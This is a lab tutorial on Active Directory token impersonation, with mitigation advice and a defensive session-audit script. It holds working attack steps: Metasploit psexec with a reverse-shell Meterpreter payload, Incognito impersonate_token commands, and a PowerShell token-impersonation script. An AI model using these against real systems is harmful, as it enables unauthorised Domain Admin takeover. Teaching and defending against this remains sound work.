Game of Tokens: AD post exploitation with Token Impersonation
Greetings fellow Readers. Welcome to “Game of Tokens,” where the rules of engagement shift, and the battle for Active Directory (AD) control reaches new heights.
What are Tokens?
In straightforward terms, an access token is a kernel object that Windows attaches to every process and thread. It records who the code is running as (the user's SID), the groups that user belongs to, the privileges the user holds, and the logon session it was created from. Windows checks the token, not your password, on every file, registry or network access, which is why you type your credentials once at logon and never again for the rest of the session.
How do these tokens work ?
Before delving into the inner workings of these tokens, let’s explore a few key processes that will provide us with a better understanding of how they operate.
- Userinit: Userinit.exe is started by Winlogon right after a user logs on (not at boot). It sets up the user's environment: loading the profile, running logon scripts and launching the shell (Explorer) with the user's freshly minted token, from which every program the user later starts inherits a copy.
- Winlogon: Winlogon.exe is another essential process involved in user authentication and session management. It handles the login and logout procedures, as well as interactions with the Secure Attention Sequence (SAS) dialog, such as the Ctrl+Alt+Delete screen. Winlogon ensures that the user’s session is secure and correctly initialized during login and logout.
- LSASS (Local Security Authority Subsystem Service): LSASS.exe is a core component of Windows security. It manages user authentication and security policies. LSASS is responsible for enforcing security policies, handling password changes, and verifying user credentials during the login process. It also plays a crucial role in generating access tokens, which control user privileges and access rights.
Now, let’s grasp how the tokens function through an illustrative scenario.
Imagine you're the boss of a super-secret club, and you have a magical stamp. That stamp is your "access token": it says who you are and which rooms you are allowed into.
LSASS is the doorman who makes the stamp when you show your ID at the door (your logon). The doorman hands it to Winlogon, who passes it to Userinit, who opens your desktop with it. From then on every program you launch inherits a copy of the stamp, and whenever one of them wants to open a door, the guard looks at the stamp instead of asking for your ID again. So your buddies (Userinit, Explorer and their friends) are all doing things with your superpowers.
Here's the catch: the stamps stay in the club for as long as those programs are running. Anyone who can get hold of one of them, say a copy of a stamp that reads "Administrator", can walk through the same doors, and the guards will write the administrator's name in the log, not the thief's.
And that's how access tokens work in Windows, and why a leftover token is worth more to an attacker than a password prompt.
Token Impersonation is often used in post-exploitation scenarios, where an attacker has already compromised a system but needs to escalate their privileges further. By impersonating the token of a higher-privileged user, the attacker can gain access to resources and perform actions that would otherwise be restricted.
Types Of Tokens
Windows itself distinguishes two token types: a primary token, attached to a process, and an impersonation token, attached to a thread so that a service can act on a client's behalf. Every impersonation token carries an impersonation level (Anonymous, Identification, Impersonation or Delegation) that caps what its holder may do with it. Incognito folds this into the two labels you will see in its list_tokens output:
- Delegation tokens: left behind by interactive logons, primarily a console logon or a Remote Desktop (RDP) session (service logons show up here too, which is why NT AUTHORITY\SYSTEM and the built-in service accounts appear in the same list). Because LSASS holds that user's credentials for the logon session, a delegation token can authenticate to other systems. These pose the largest threat: stealing one on a workstation lets you act as that user across the network.
- Impersonation tokens: created by non-interactive logons, typically a network logon such as a user mapping a share on this host or a domain logon script touching it. They are valid only for actions on the local machine; an attacker cannot ride one to another host.
Why Token Impersonation is dangerous ?
Token impersonation is dangerous because it allows an attacker to assume the identity and privileges of another user or process on a system without ever learning that user's password. Here's why it's considered risky:
- Privilege Escalation: Attackers can use token impersonation to escalate their privileges within a system or network.
- Stealthy Intrusion: Token impersonation is often difficult to detect because the attacker is operating under the guise of a legitimate user or process. This makes it an effective way to move laterally within a network without raising suspicions.
- Access to Sensitive Data: Attackers can access sensitive data, manipulate critical system settings, and carry out malicious activities, all while appearing as a trusted user or process.
- Bypassing Security Controls: Token impersonation can be used to bypass security controls and gain unauthorized access to protected resources, making it a significant threat to the integrity of a system.
- Lack of Traceability: Since the actions are attributed to the impersonated user or process, it becomes challenging to trace malicious activity back to the actual attacker. This can hinder incident response efforts.
- Abuse of Trusted Relationships: Token impersonation can exploit the trust relationships that exist between users and systems. This abuse of trust can lead to significant security breaches.
Tell me, Why did the token impersonation expert always win at hide and seek? Because they could hide as anyone!
Attack Demonstration
This attack requires you to have an initial foothold within the network -> like access to a shell or a set of credentials.
For this attack, we'll leverage Incognito. It started life as a standalone tool by Luke Jennings and now ships as a Meterpreter extension, so it is loaded into an existing Meterpreter session rather than run as a separate module.
This attack is showcased in an Active Directory home lab. You are encouraged to replicate this experiment in your own home lab, but always ensure that your actions are within legal boundaries.
Step-1: Gaining Initial Foothold using metasploit
Initially, we’ll establish a foothold in the network. This attack depends on having that initial foothold, and we already possess the necessary credentials to commence.
Username: fcastle
Password: Password123
We will use the psexec exploit module in Metasploit:
msfconsole
use exploit/windows/smb/psexec
Step-2: Setting up the required options
Set SMBUser, SMBPass, SMBDomain, LHOST and RHOSTS (this module takes RHOSTS, not RHOST).
Set TARGET to Native upload (Id 2).
Set PAYLOAD to windows/x64/meterpreter/reverse_tcp.
Step-3: Run the module
Running the module with exploit uploads a service binary over SMB and starts it, so the Meterpreter session that comes back runs as NT AUTHORITY\SYSTEM. That matters for the next step: SYSTEM holds SeDebugPrivilege and SeImpersonatePrivilege, so it can open other users' processes and reach the tokens inside them.
Step-4: Load the incognito module.
load incognito
Using Incognito
- To view the tokens, type list_tokens -u. Incognito lists every token it can reach, split into Delegation Tokens Available and Impersonation Tokens Available. The list is only complete from a SYSTEM (or SeDebugPrivilege-holding) context, which the psexec session gives us. In this lab a delegation token for MARVEL\Administrator shows up, which tells us that domain admin logged on to this host interactively (console or RDP) and still has a process running under that logon session.
- To impersonate a token, type impersonate_token MARVEL\\Administrator. (The extra backslash escapes the separator in the Meterpreter console.)
- After successfully impersonating the token, getuid shows the user the Meterpreter server is now running as; it should report MARVEL\Administrator instead of NT AUTHORITY\SYSTEM.
- At this point we are acting as a Domain Admin. Because this is a delegation token it can also authenticate to other hosts, the domain controller included, not just this machine. Nothing was cracked or dumped: a privileged user simply left a token behind on a box we already controlled.
To return to our original identity (the SYSTEM context the psexec service gave us), we use the rev2self command.
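The same steps without Incognito, as an added example that is not part of the original post: the Win32 calls behind impersonate_token and rev2self, driven from PowerShell through P/Invoke. It assumes you already run as SYSTEM (as the psexec session does) or as an administrator holding SeDebugPrivilege, and the target user name you pass in is an assumption. It also prints the impersonation level of the thread token before, during and after, which is the property the Types of Tokens section describes.

```powershell
# Added example (not the post's own code): impersonate a logged-on user's token
# with the Win32 API, the way incognito's impersonate_token does under the hood.
# Run as SYSTEM or an elevated admin with SeDebugPrivilege. -TargetUser is an
# assumption, e.g. 'MARVEL\Administrator'.
param(
    [Parameter(Mandatory)] [string] $TargetUser
)

Add-Type -Namespace Win32 -Name Token -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenProcessToken(IntPtr hProcess, uint dwDesiredAccess, out IntPtr hToken);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes,
    int ImpersonationLevel, int TokenType, out IntPtr phNewToken);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool RevertToSelf();

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@

$PROCESS_QUERY_INFORMATION = 0x0400
$TOKEN_DUPLICATE           = 0x0002
$TOKEN_QUERY               = 0x0008
$MAXIMUM_ALLOWED           = 0x02000000
$SecurityImpersonation     = 2      # SECURITY_IMPERSONATION_LEVEL enum value
$TokenImpersonation        = 2      # TOKEN_TYPE enum value

function Get-CallerName {
    # WindowsIdentity.GetCurrent() reflects the thread token while impersonating,
    # so this behaves like Meterpreter's getuid.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    '{0} (impersonation level: {1})' -f $id.Name, $id.ImpersonationLevel
}

function Get-LastError { [System.ComponentModel.Win32Exception]::new().Message }

# 1. Find a process already running as the target user: the same source incognito
#    draws on, a token left behind by that user's logon. -IncludeUserName needs
#    elevation and PowerShell 4 or later.
$proc = Get-Process -IncludeUserName |
    Where-Object { $_.UserName -eq $TargetUser } |
    Select-Object -First 1
if (-not $proc) { throw "No process running as $TargetUser on this host" }

"Before: $(Get-CallerName)"

# 2. Open the process and its primary token with just enough access to copy it.
$hProc = [Win32.Token]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $proc.Id)
if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess failed: $(Get-LastError)" }

$hToken = [IntPtr]::Zero
if (-not [Win32.Token]::OpenProcessToken($hProc, ($TOKEN_DUPLICATE -bor $TOKEN_QUERY), [ref] $hToken)) {
    throw "OpenProcessToken failed: $(Get-LastError)"
}

# 3. Duplicate it as an impersonation token and attach it to the current thread.
$hDup = [IntPtr]::Zero
if (-not [Win32.Token]::DuplicateTokenEx($hToken, $MAXIMUM_ALLOWED, [IntPtr]::Zero,
        $SecurityImpersonation, $TokenImpersonation, [ref] $hDup)) {
    throw "DuplicateTokenEx failed: $(Get-LastError)"
}
if (-not [Win32.Token]::ImpersonateLoggedOnUser($hDup)) {
    throw "ImpersonateLoggedOnUser failed: $(Get-LastError)"
}

"During: $(Get-CallerName)"   # reports the target user, like getuid after impersonate_token

# 4. Drop back to the original identity (incognito's rev2self) and release handles.
[void][Win32.Token]::RevertToSelf()
"After: $(Get-CallerName)"

foreach ($h in @($hDup, $hToken, $hProc)) { [void][Win32.Token]::CloseHandle($h) }
```

Two things worth noticing when you run it. The impersonation only affects the calling thread, so anything that must run as the target user has to happen between the ImpersonateLoggedOnUser and RevertToSelf calls. And DuplicateTokenEx cannot raise the level of a token that is itself an impersonation token (a network-logon token held by a server thread); that API rule is the root of the delegation-versus-impersonation split Incognito reports.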
Mitigation
Mitigating the risks of token impersonation requires a combination of proactive measures and security best practices. Here are some key mitigation strategies:
- Implement Least Privilege: Ensure that users and processes have the minimum level of access necessary to perform their tasks. This limits the potential damage that can be done if a token impersonation attack occurs.
- Monitor and Audit: Collect logon telemetry centrally and alert on it in a security information and event management (SIEM) system. Impersonating a token creates no new logon session, so the compromised host records no 4624 for it; using the stolen token against another machine does. A Domain Admin account producing a network logon (event ID 4624, logon type 3) on a domain controller or file server from an ordinary workstation is exactly the pairing a rule should catch, as is a SYSTEM service process whose child runs as a domain user.
- Regularly Review Access Rights: Periodically review and update user and group access rights. Remove unnecessary privileges and access rights to reduce the potential impact of an attack.
- Multi-Factor Authentication (MFA): Enforce MFA for user accounts, especially for privileged users. MFA can significantly enhance security by adding an additional layer of authentication.
- Endpoint Protection: Employ endpoint protection solutions that can detect and prevent malicious activities, including token impersonation.
- Network Segmentation: Implement network segmentation to isolate critical assets and restrict lateral movement within the network. This can limit the spread of attacks.
- Privileged Access Management (PAM): Use PAM solutions to tightly control and monitor access to privileged accounts. This helps prevent unauthorized access and reduces the risk of token impersonation.
- Limit Access to Tokens: A privileged token is only there to steal if the privileged user logged on to that host, so the strongest control is administrative tiering: Domain Admin and other tier-0 accounts log on only to domain controllers and dedicated admin workstations, never to ordinary workstations or member servers, and help-desk work is done with separate, lower-privileged accounts. When a privileged logon to a lower-tier host is unavoidable, log off afterwards rather than just disconnecting; ending the logon session kills its processes and with them the tokens an attacker could have picked up.
- User Training: Educate users and administrators about the risks of token impersonation and the importance of strong authentication and access control.
- Patch and Update: Keep systems and software up to date with the latest security patches and updates to mitigate vulnerabilities that attackers could exploit.
- Incident Response Plan: Develop and maintain a robust incident response plan that includes procedures for identifying and responding to token impersonation attacks.
- Red Team Testing: Conduct regular red team exercises to identify vulnerabilities and weaknesses in your security measures and incident response procedures.
- Security Policies and Procedures: Establish and enforce security policies and procedures that define acceptable use, access control, and authentication requirements.
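A defender-side check for the condition the attack relied on, as an added example that is not part of the original post: a PowerShell script that lists the interactive and RDP logon sessions on a host and flags those belonging to privileged accounts, the sessions whose delegation tokens list_tokens would show to an attacker with SYSTEM there. The privileged account list and the computer name are assumptions; in practice feed the list from Domain Admins membership.

```powershell
# Added example (not the post's own code): find interactive/RDP logon sessions
# that belong to privileged accounts on a host. Those are the sessions whose
# delegation tokens an attacker with SYSTEM on that host can impersonate.
# $PrivilegedAccounts is an assumption; populate it from Domain Admins membership.
param(
    [string[]] $PrivilegedAccounts = @('MARVEL\Administrator'),
    [string]   $ComputerName = ''          # empty = query the local machine
)

# Logon types produced by interactive use (Win32_LogonSession.LogonType):
# 2 = Interactive (console), 10 = RemoteInteractive (RDP), 11 = CachedInteractive.
$RiskyLogonTypes = @{ 2 = 'Interactive'; 10 = 'RemoteInteractive'; 11 = 'CachedInteractive' }

function Get-PrivilegedInteractiveSession {
    param([string[]] $Privileged, [string] $Computer)

    $cim = @{}
    if ($Computer) { $cim.ComputerName = $Computer }   # remote queries go over WinRM
    $name = if ($Computer) { $Computer } else { $env:COMPUTERNAME }

    $sessions = Get-CimInstance -ClassName Win32_LogonSession @cim
    $mappings = Get-CimInstance -ClassName Win32_LoggedOnUser @cim

    # Index sessions by LogonId so each account-to-session mapping resolves to a type.
    $byId = @{}
    foreach ($s in $sessions) { $byId[$s.LogonId] = $s }

    foreach ($m in $mappings) {
        $account = '{0}\{1}' -f $m.Antecedent.Domain, $m.Antecedent.Name
        $session = $byId[$m.Dependent.LogonId]
        if (-not $session) { continue }

        $typeName = $RiskyLogonTypes[[int]$session.LogonType]
        if ($typeName -and ($Privileged -contains $account)) {
            [pscustomobject]@{
                Computer  = $name
                Account   = $account
                LogonId   = $session.LogonId
                LogonType = $typeName
                StartTime = $session.StartTime
            }
        }
    }
}

$findings = @(Get-PrivilegedInteractiveSession -Privileged $PrivilegedAccounts -Computer $ComputerName)
if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
} else {
    "No privileged interactive sessions found."
}
```

Run it elevated, and treat a hit as a lead rather than proof: Win32_LogonSession can still list a session whose processes have all exited, so confirm with query user or Get-Process -IncludeUserName before paging anyone. Scheduling it across the workstation tier turns the "Limit Access to Tokens" item above into something you can measure.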
Mitigating token impersonation threats requires a multi-layered approach that combines technical controls, user awareness, and proactive monitoring. Additionally, it’s essential to stay informed about emerging threats and adapt your security measures accordingly.